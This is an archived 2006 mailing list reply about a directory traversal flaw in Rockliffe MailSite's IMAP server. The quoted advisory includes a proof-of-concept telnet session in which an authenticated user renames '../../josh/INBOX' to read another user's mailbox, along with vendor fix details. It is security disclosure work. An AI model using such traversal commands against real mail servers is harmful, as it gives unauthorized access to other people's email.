lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <Pine.LNX.4.61.0601050650440.6775@zur>
Date: Thu, 5 Jan 2006 06:51:07 -0500 (EST)
From: Josh Zlatin <jzlatin@...at.cc>
To: Stan Bubrouski <stan.bubrouski@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: Rockliffe Directory Transversal Vulnerability


On Wed, 4 Jan 2006, Stan Bubrouski wrote:

> Seeing as most IMAP servers allow you to use ../../ with SELECT, etc..
> (think uw-imapd for example) I think I would categorize this as more
> of a permissions problem.

The Mailsite IMAP server needs to run as the local system account. The
IMAP server can not run as a regular user. Removing write permissions
from the individual IMAP accounts has no effect in stopping users
from stealing directories (such as INBOX) from other accounts.

--
   - Josh

>
> -sb
>
> On 1/4/06, Josh Zlatin <jzlatin@...at.cc> wrote:
>> Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
>>
>> Product: Rockliffe Mailsite
>>          http://www.rockliffe.com
>>
>> Version: Confirmed on Mailsite < 6.1.22.1
>>
>> Author: Josh Zlatin-Amishav
>>
>> Date: January 4, 2006
>>
>> Background:
>> Rockliffe MailSite secure email server software and MailSite MP secure email
>> gateways provide email server solutions and gateway email protection for
>> businesses and service providers. Rockliffe has more than 3,000 customers
>> hosting more than 15 million mailboxes worldwide.
>>
>> Issue:
>> In working with researchers at Tenable Network Security, I have come across
>> a directory transversal flaw in the IMAP server. It is possible for an
>> authenticated user to access any user's inbox via a RENAME command.
>>
>> PoC:
>>
>> josh@...1:~$ telnet 10.0.0.5 143
>> Trying 10.0.0.5...
>> Connected to 10.0.0.5.
>> Escape character is '^]'.
>> * OK  MailSite IMAP4 Server 6.1.22.0 ready
>> a1 login joe pass
>> a1 OK LOGIN completed
>> a2 rename ../../josh/INBOX gotcha
>> a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
>> a3 select gotcha
>> * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
>> * 0 EXISTS
>> * 0 RECENT
>> * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
>> * OK [UNSEEN 0]
>> * OK [UIDVALIDITY 514563061] UIDs are valid
>> a3 OK [READ-WRITE] opened gotcha
>>
>> user joe can now access the contents of user josh's INBOX directory.
>>
>> Vendor notified: January 3, 2006 06:12AM
>>
>> Vendor Response:
>> Contact your sales rep about purchasing Mailsite 7.0.3.1
>>
>> Solution:
>> Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes
>> the directory transversal problem. Either upgrade to version 6.1.22 and install
>> the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
>> Mailsite. The hotfix can be obtained at:
>>
>> ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe
>>
>> References: http://www.rockliffe.com
>> References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ